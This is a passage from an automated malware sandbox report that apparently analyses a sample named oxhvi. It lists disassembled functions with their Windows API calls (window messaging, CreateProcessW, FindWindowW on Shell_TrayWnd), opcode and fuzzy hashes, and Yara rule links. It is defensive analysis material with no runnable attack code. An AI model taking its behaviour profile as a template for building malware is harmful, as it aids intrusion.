                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                      • String ID: static
                                                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                                                      • Opcode ID: 47630474a0a2415abc6bed5fcf8714aca7ba3b1a437829d9ee28eedef729833e
                                                                                                                                                      • Instruction ID: 957bdec688028d1dd1b05ef280cacc406fdb03eb81b20420aed2fc0a860262d6
                                                                                                                                                      • Opcode Fuzzy Hash: 47630474a0a2415abc6bed5fcf8714aca7ba3b1a437829d9ee28eedef729833e
                                                                                                                                                      • Instruction Fuzzy Hash: A611267261020AAFDB01DFA8CC4AEFA7BB8FB08314F004928F955E7250E674E851DB60
                                                                                                                                                      Function 005C6AE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 005C6B5B
                                                                                                                                                      • SendMessageW.USER32(?,00000194,00000000,00000000), ref: 005C6B84
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                      • String ID: Hb
                                                                                                                                                      • API String ID: 3850602802-1270690246
                                                                                                                                                      • Opcode ID: 03ceed41a8cca5786fcebf3a39ea271b15867c0833532f51148bdb9facc9fe41
                                                                                                                                                      • Instruction ID: 97aeb140d6aa522d3773febaf08609dc691e862465f110db342ba5cd4d4048bd
                                                                                                                                                      • Opcode Fuzzy Hash: 03ceed41a8cca5786fcebf3a39ea271b15867c0833532f51148bdb9facc9fe41
                                                                                                                                                      • Instruction Fuzzy Hash: 98115E71140208BEEB158FA8CC1AFB93BA4FB09728F104219FA16EA1D0D6B1DF50EB50
                                                                                                                                                      Function 0059256E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                        • Part of subcall function 00594536: GetClassNameW.USER32(?,?,000000FF), ref: 00594559
                                                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 005925DC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                      • Opcode ID: d754960a80a7bcb2ce4c6c768df755e8f4e272d9f099b87b219cb6e2783755b9
                                                                                                                                                      • Instruction ID: 1c7590f041ebb5940ec48a310dd01661b5fae017c09e24d5ceef6ab51055f8c2
                                                                                                                                                      • Opcode Fuzzy Hash: d754960a80a7bcb2ce4c6c768df755e8f4e272d9f099b87b219cb6e2783755b9
                                                                                                                                                      • Instruction Fuzzy Hash: 6F01287560011ABBCF04EBA4CC15DFE7F65FF91310F040A19B9629B2D2EA309808D750
                                                                                                                                                      Function 00592468 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                        • Part of subcall function 00594536: GetClassNameW.USER32(?,?,000000FF), ref: 00594559
                                                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 005924D6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                      • Opcode ID: eebb4825791f47b9a5f7d9d8fa7f69256317357b8cf1c0ea59ade571e110e8e5
                                                                                                                                                      • Instruction ID: 9c48e022b90b00b9e20d06da0776582f3174bddad4923e78983de96930683745
                                                                                                                                                      • Opcode Fuzzy Hash: eebb4825791f47b9a5f7d9d8fa7f69256317357b8cf1c0ea59ade571e110e8e5
                                                                                                                                                      • Instruction Fuzzy Hash: 3401A77564010ABBDF18EBA0C855EFF7FA9FF95340F14001A760667282DA609E08D6B1
                                                                                                                                                      Function 005924EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                        • Part of subcall function 00594536: GetClassNameW.USER32(?,?,000000FF), ref: 00594559
                                                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00592558
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                      • Opcode ID: e268664e98c5c00bdf58eb70a52c4d13c645e83ccdf0a074f06bbf389b3cd0d0
                                                                                                                                                      • Instruction ID: 5a498e5d145a40fb4f530d0582736cc0fcff46b90f2a754eb672e12c12fe1b02
                                                                                                                                                      • Opcode Fuzzy Hash: e268664e98c5c00bdf58eb70a52c4d13c645e83ccdf0a074f06bbf389b3cd0d0
                                                                                                                                                      • Instruction Fuzzy Hash: CC01D67564010ABBDF14EBA4C916FFFBFA8FF51740F140015BA02B7282EA259F099A71
                                                                                                                                                      Function 005925F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                        • Part of subcall function 00594536: GetClassNameW.USER32(?,?,000000FF), ref: 00594559
                                                                                                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00592663
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                      • Opcode ID: cbfd9a58eb799836da720e68478ceccf0647433332940e5e992c0def0c5f78d3
                                                                                                                                                      • Instruction ID: a2a4b4da0b9c1bca3b7bf1522cf3cb57337a877894ad1c46e42299c1c56253a6
                                                                                                                                                      • Opcode Fuzzy Hash: cbfd9a58eb799836da720e68478ceccf0647433332940e5e992c0def0c5f78d3
                                                                                                                                                      • Instruction Fuzzy Hash: F3F08171A4021ABADF14E7A4DC56FFFBF78FB51710F040A19B662A72C2DF6059098660
                                                                                                                                                      Function 005C8AD1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00604018,0060405C), ref: 005C8B1E
                                                                                                                                                      • CloseHandle.KERNEL32 ref: 005C8B30
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                      • String ID: \@`
                                                                                                                                                      • API String ID: 3712363035-657203355
                                                                                                                                                      • Opcode ID: 0b9fac36a8be36f0046f925915c8037c6347b9cff1082d35b235c114aa3f0252
                                                                                                                                                      • Instruction ID: 57f8be4b3f1b1c8e0a207bd9ec22b222ee993ba313509780d8ee17ebb16e4ff3
                                                                                                                                                      • Opcode Fuzzy Hash: 0b9fac36a8be36f0046f925915c8037c6347b9cff1082d35b235c114aa3f0252
                                                                                                                                                      • Instruction Fuzzy Hash: C4F03AF2580315BEF3302B60AC59FB73E5DEB15795F005425BB09E61A2DE654C4493B8
                                                                                                                                                      Function 005C2C81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005C2C8B
                                                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 005C2C9E
                                                                                                                                                        • Part of subcall function 0059F1A7: Sleep.KERNEL32 ref: 0059F21F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                      • Opcode ID: aed59866e257827a9e459e6392b4ae11011db26ca610879ab13f5a1bc9d3d910
                                                                                                                                                      • Instruction ID: f93a060e2df67d3ba5bbc93bf026f145b2acf800c1bc6a8e5c55ab9a56062404
                                                                                                                                                      • Opcode Fuzzy Hash: aed59866e257827a9e459e6392b4ae11011db26ca610879ab13f5a1bc9d3d910
                                                                                                                                                      • Instruction Fuzzy Hash: C8D0C9353D5754ABE668B770DC0FFD66E64ABA4B10F000825B349EA1D0C9A4A844D6A4
                                                                                                                                                      Function 005C2CB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005C2CCB
                                                                                                                                                      • PostMessageW.USER32(00000000), ref: 005C2CD2
                                                                                                                                                        • Part of subcall function 0059F1A7: Sleep.KERNEL32 ref: 0059F21F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                      • Opcode ID: b542ba2635d7f7b91b26d032bd6f17c3e359840e7abf1f20424c043cb2972d7c
                                                                                                                                                      • Instruction ID: 445bdcb06aef97a3b61fc2add683ed1796164c6196155a0a712b635c71e5f43d
                                                                                                                                                      • Opcode Fuzzy Hash: b542ba2635d7f7b91b26d032bd6f17c3e359840e7abf1f20424c043cb2972d7c
                                                                                                                                                      • Instruction Fuzzy Hash: 69D0C9353C57546BF668B770DC0FFD66A64ABA4B10F400825B345EA1D0C9A4A844D6A8
                                                                                                                                                      Function 0056C19D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0056C233
                                                                                                                                                      • GetLastError.KERNEL32 ref: 0056C241
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0056C29C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1717984340-0
                                                                                                                                                      • Opcode ID: d1e12c877c46738716599d0f43948bd0728efa16d7f5688e782eb69db7854a12
                                                                                                                                                      • Instruction ID: 1886826cd526cf4717d1b421987c6cad262d99fdf77bc809c368557906898a34
                                                                                                                                                      • Opcode Fuzzy Hash: d1e12c877c46738716599d0f43948bd0728efa16d7f5688e782eb69db7854a12
                                                                                                                                                      • Instruction Fuzzy Hash: 2E41D635600246AFCF218FE9C864ABA7FB5FF45710F254169ECE9AB2A1DB308D05D760